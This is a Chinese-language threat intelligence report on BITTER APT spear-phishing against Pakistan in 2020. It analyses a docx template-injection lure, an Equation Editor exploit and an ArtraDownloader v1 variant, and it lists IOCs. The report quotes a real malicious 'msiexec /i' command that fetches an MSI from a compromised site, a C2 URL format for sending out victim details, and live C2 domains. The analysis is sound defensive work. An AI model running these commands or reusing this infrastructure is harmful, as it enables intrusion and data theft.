BITTER組織(又稱APT-C-08、T-APT-17、蔓靈花、苦象)是一個長期針對亞洲國家進行攻擊活動的APT組織,其還曾被發現對沙烏地阿拉伯進行攻擊,初期該組織的特碼數據包頭部常以「BITTER」作為標識,因此被命名為「BITTER」。BITTER組織主要針對軍工、政府、電力和核工業等敏感行業進行攻擊,從2019年起,該組織對我國相關進出口行業加強了攻擊,意圖竊取敏感資料。
近期,國內有關安全情報中心捕捉到BITTER組織針對巴基斯坦地區的相關攻擊樣本,本次捕獲的樣本是該組織一慣使用的下載樣本,通過魚叉攻擊來發送惡意模板注入docx文件,docx文件下載惡意漏洞模板並執行。例如「Guidelines for Extension of official-Gratis Passports.docx」(免費提供的官方護照延期指南.docx)
該漏洞模板文件是公式編輯器漏洞文件
可見下載的rgn文件編譯於2020.06.06 15:34:12,保存於c:\rgn\rgn.exe,該文件為該組織曾在過往攻擊活動中使用過的下載器變種木馬,詳見下圖:
在本次捕獲的攻擊活動中發現的另一例msi惡意文件,該樣本同樣利用docx模板注入技術來下載公式漏洞模板文件,將
「msiexec /i http://www.bheragreens.com/img/winsupdater.msi」執行命令寫入runonece註冊表,完成病毒下載執行
利用該惡意msi文件打包了惡意文件wnupdte.exe
提取其中的wnupdte.exe病毒文件,可見其編譯時間為2020年1月6日19:10:40,通過詳細分析可以推斷該病毒為ArtraDownloader v1變種,詳見下圖:
其存在一個對話框資源,被命名為「About ESET-Dwn」
通過對該病毒進行分析發現,其首先會從字符串資源中獲取窗體的窗口名稱(ESET-Dwn)和窗口類名(ESETDWN)
再通過獲取的名稱,來創建一個窗體
然後該病毒會對加密的字符串進行解密,有兩種解密方式,其中一種是直接加5,另一種是加上循環變量加1,其中C2解密為mia.alkhaleejpk.info
接著該病毒會檢測進程「winupdt」(檢測自身是否存在)及「avpui」(kaspersky相關文件)進程是否存在,若「winupdt」進程不存在,則拷貝自身到sendto目錄。
若「avpui」進程存在,則會通過設置註冊表啟動項用於駐留(「%tempf%」環境變量指向自身複製的文件),詳見下表:
若「avpui」進程不存在,則會在開始菜單目錄下放置winup.lnk快捷方式文件以駐留(lnk文件指向自身複製的文件winupdt.exe)。
接下來該病毒還會獲取受害機的基本信息,用戶名、主機名、作業系統名稱
再將信息按照以下格式進行拼接,採用$進行分割
http://mia.alkhaleejpk.info/PsehestyvuPw/F1l3estPhPInf1.php?info=Test$WIN-P01LA5VOT7J$admin$Windows7Ultimate-$-$WIN-P01LA5VOT7Jadmin
該病毒發起的相關get請求流量,將獲取的基本信息上傳到C2,詳見下圖:
創建信號量「error」
接下來該病毒會檢測返回數據,檢測是否存在下載執行任務,若存在下載執行任務,下載文件寫入並通過ShellExecuteA來執行下載的文件。
相關安全團隊通過對樣本C2的詳細分析,可見在2020年01月時,已有相關攻擊活動出現,本次發現的攻擊活動主要集中在2020年6月到2020年10月左右。
在同域名下存在另一個C2,mi.alkhaleejpk.info, 這兩個域名都解析到82.221.136.4
通過繼續分析C2,我們發現該地址疑似該組織的後臺管理地址,通過設置windows背景圖來隱藏登錄界面,這符合該組織近期的後臺變化情況:
該頁面登錄源碼詳見下圖:
詳細分析該病毒的文件,其被託管在bheragreens.com/img/winsupdater.msi
該網站是巴基斯坦私人住房協會相關的公司網站,主要負責一些基礎設施建設等,被入侵者用於託管惡意文件
liveways.pk是巴基斯坦相關的IT基礎架構解決方案和託管服務提供商,官網被入侵者用於託管惡意軟體
另外通過該下載器請求特徵和相關文件特徵,相關安全團隊確認該下載器為ArtradDownloader v1的變種,該變種的特徵一直在進行變化,通過分析,我們還發現了請求為info=ssss,使用『@』進行分割的變種文件
從該攻擊樣本提交區域和託管惡意文件網站處於巴基斯坦的相關情況進行分析,基本確定本次攻擊活動是BITTER組織在2020年6月到2020年10月對巴基斯坦進行的相關攻擊活動。
IOC
C2:
mi.alkhaleejpk.info
mia.alkhaleejpk.info
www.bheragreens.com/img/winsupdater.msi
http://liveways.pk/images/rgnd
http://liveways.pk/images/rgn
box.livevideosonlinepk.com
82.221.136.4
Hash:
f5b87d9800aeb64d92dafd758f1d642b (Guidelines for Extension of official-Gratis Passports.docx)
65be1e3712805bb0356f7e85c861f924 (rgnd)
808849de500179ec0fbc82c862f62333 (rgn、wnupdte.exe)
d30d19062bc6668e856946c63b6e9218 (winsupdater.msi)
df0cd6ac04f08a3c46546bc238dbacb1 (rt.msi)
761570587a2f92eea1512ff159ccef29 (rt.msi)
d3204365e948370998afdf6e903c7948 (e739.msi)
17e06d7e7789c6feaf41eb6be7885d62 (wnupdte.exe)
de6457c8bbb8e46154eec6b34d8d758a (wnupdte.exe)
72af5d72af656a593a6607554b7d25dd (wnupdte.exe)
5f63cc9905e26cfc18c14720ea02c158 (wnupdte.exe)
https://www.anquanke.com/post/id/214641
https://mp.weixin.qq.com/s/IcLGzGJYFx3dPUed0Bgv5w
https://mp.weixin.qq.com/s/TbiXJ359ZXOyQYWsfVDwGA
https://app.any.run/tasks/0751882a-3a21-48e7-bfeb-09c48deb649f/#
https://twitter.com/Timele9527/status/1280315854094123008
https://unit42.paloaltonetworks.com/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/